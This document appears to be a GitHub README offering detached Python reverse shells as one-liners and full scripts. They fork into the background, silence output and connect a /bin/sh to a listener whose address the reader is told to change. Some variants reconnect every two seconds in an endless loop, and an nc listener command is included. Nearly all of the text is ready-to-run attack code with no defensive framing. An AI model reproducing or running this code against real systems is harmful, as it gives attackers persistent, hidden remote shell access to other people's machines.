Please, consider make a donation: https://github.com/sponsors/therealdreg
Python 2 & 3 reverse shell one liner detached (background) By David Reguera Garcia aka Dreg
just change connect(("127.0.0.1",9999))
Simple background detached reverse shell:
python -c 'exec("""\nimport socket,subprocess,os,sys\n\npidrg = os.fork()\nif pidrg > 0:\n sys.exit(0)\n\nos.chdir("/")\n\nos.setsid()\n\nos.umask(0)\n\ndrgpid = os.fork()\nif drgpid > 0:\n sys.exit(0)\n\nsys.stdout.flush()\n\nsys.stderr.flush()\n\nfdreg = open("/dev/null", "w")\n\nsys.stdout = fdreg\n\nsys.stderr = fdreg\n\nsdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nsdregs.connect(("127.0.0.1",9999))\n\nos.dup2(sdregs.fileno(),0)\n\nos.dup2(sdregs.fileno(),1)\n\nos.dup2(sdregs.fileno(),2)\n\np=subprocess.call(["/bin/sh","-i"])\n""")'
Infinite loop background detached reverse shell each 2 seconds:
python -c 'exec("""\nimport socket,subprocess,os,sys, time\n\npidrg = os.fork()\nif pidrg > 0:\n sys.exit(0)\n\nos.chdir("/")\nos.setsid()\nos.umask(0)\ndrgpid = os.fork()\nif drgpid > 0:\n sys.exit(0)\n\nwhile 1:\n try:\n sys.stdout.flush()\n\n sys.stderr.flush()\n\n fdreg = open("/dev/null", "w")\n\n sys.stdout = fdreg\n\n sys.stderr = fdreg\n\n sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n sdregs.connect(("127.0.0.1",9999))\n\n os.dup2(sdregs.fileno(),0)\n\n os.dup2(sdregs.fileno(),1)\n\n os.dup2(sdregs.fileno(),2)\n\n p=subprocess.call(["/bin/sh","-i"])\n\n sdregs.close()\n\n except Exception:\n pass\n\n time.sleep(2)\n""")'
Just wait for reverse shell with a nc
while true; do nc -lvp 9999; done
I made this for my shellcode injector in sudo shells via ptrace:
https://github.com/David-Reguera-Garcia-Dreg/drx_ptrace_shellcode_injector
https://github.com/David-Reguera-Garcia-Dreg/ptrace_misconfiguration_local_privilege_escalation
https://github.com/David-Reguera-Garcia-Dreg/
multi line code
Simple reverse shell
#!/usr/bin/env python
# David Reguera Garcia aka Dreg
# https://github.com/David-Reguera-Garcia-Dreg/
# http://www.fr33project.org
# dreg@fr33project.org
import socket,subprocess,os,sys
pidrg = os.fork()
if pidrg > 0:
sys.exit(0)
os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
sys.exit(0)
sys.stdout.flush()
sys.stderr.flush()
fdreg = open("/dev/null", "w")
sys.stdout = fdreg
sys.stderr = fdreg
sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sdregs.connect(("127.0.0.1",9999))
os.dup2(sdregs.fileno(),0)
os.dup2(sdregs.fileno(),1)
os.dup2(sdregs.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Infinite loop reverse shell each 2 seconds
#!/usr/bin/env python
# David Reguera Garcia aka Dreg
# https://github.com/David-Reguera-Garcia-Dreg/
# http://www.fr33project.org
# dreg@fr33project.org
import socket,subprocess,os,sys, time
pidrg = os.fork()
if pidrg > 0:
sys.exit(0)
os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
sys.exit(0)
while 1:
try:
sys.stdout.flush()
sys.stderr.flush()
fdreg = open("/dev/null", "w")
sys.stdout = fdreg
sys.stderr = fdreg
sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sdregs.connect(("127.0.0.1",9999))
os.dup2(sdregs.fileno(),0)
os.dup2(sdregs.fileno(),1)
os.dup2(sdregs.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
sdregs.close()
except Exception:
pass
time.sleep(2)